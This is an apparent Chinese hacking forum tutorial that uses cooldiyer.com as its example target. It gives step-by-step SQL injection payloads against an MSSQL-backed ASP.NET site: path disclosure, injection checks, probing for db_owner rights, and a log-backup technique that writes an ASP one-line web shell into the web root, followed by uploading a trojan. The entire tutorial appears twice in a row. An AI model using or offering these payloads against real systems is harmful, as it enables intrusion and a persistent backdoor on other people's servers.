呵呵经过上次cooldiyer的社会工程学。给我上了一课。这次就不发切图了。方法叙述给大家。
http://www.cooldiyer.com/index.aspx (就借用cooldiyer名字做个教程)
首先我们暴个路径看看。http://www.cooldiyer.com/~index.aspx
成功暴出路径。知道了路径如果是sql的数据库就可以差异备份和log备份。不过今天我们讲的是log备份。不过如果access数据库就暴出路径也没啥用。好了不多废话继续。
http://www.cooldiyer.com/news.aspx and 1=1 和and 1=2 返回不同的页面。存在注入。判断数据库。;and (select count(*) from sysobjects)>0 mssql 返回正常证明是mssql的数据库。下来来判断权限。;and 1=(SELECT IS_MEMBER('db_owner'));-- 证明是db_owner 因为现在大部分都是db的所以我一开始就直接判断是不是db的。下来判断数据库的。名字。;and (select db_name())>0 知道了路径数据库名字就可以。。
;alter database cooldiyer set RECOVERY FULL--
;create table hour (ww image)--
;backup log cooldiyer to disk = 'c:\2hour' with init--
;insert into hour (ww) values ('<%%25Execute(request("w"))%%25>')--
;backup log 数据库名 to disk = 'd:\cooldiyer\ww.asp'--
;drop table hour--
好了现在连接一句话。。传马over
http://www.cooldiyer.com/index.aspx (就借用cooldiyer名字做个教程)
首先我们暴个路径看看。http://www.cooldiyer.com/~index.aspx
成功暴出路径。知道了路径如果是sql的数据库就可以差异备份和log备份。不过今天我们讲的是log备份。不过如果access数据库就暴出路径也没啥用。好了不多废话继续。
http://www.cooldiyer.com/news.aspx and 1=1 和and 1=2 返回不同的页面。存在注入。判断数据库。;and (select count(*) from sysobjects)>0 mssql 返回正常证明是mssql的数据库。下来来判断权限。;and 1=(SELECT IS_MEMBER('db_owner'));-- 证明是db_owner 因为现在大部分都是db的所以我一开始就直接判断是不是db的。下来判断数据库的。名字。;and (select db_name())>0 知道了路径数据库名字就可以。。
;alter database cooldiyer set RECOVERY FULL--
;create table hour (ww image)--
;backup log cooldiyer to disk = 'c:\2hour' with init--
;insert into hour (ww) values ('<%%25Execute(request("w"))%%25>')--
;backup log 数据库名 to disk = 'd:\cooldiyer\ww.asp'--
;drop table hour--
好了现在连接一句话。。传马over
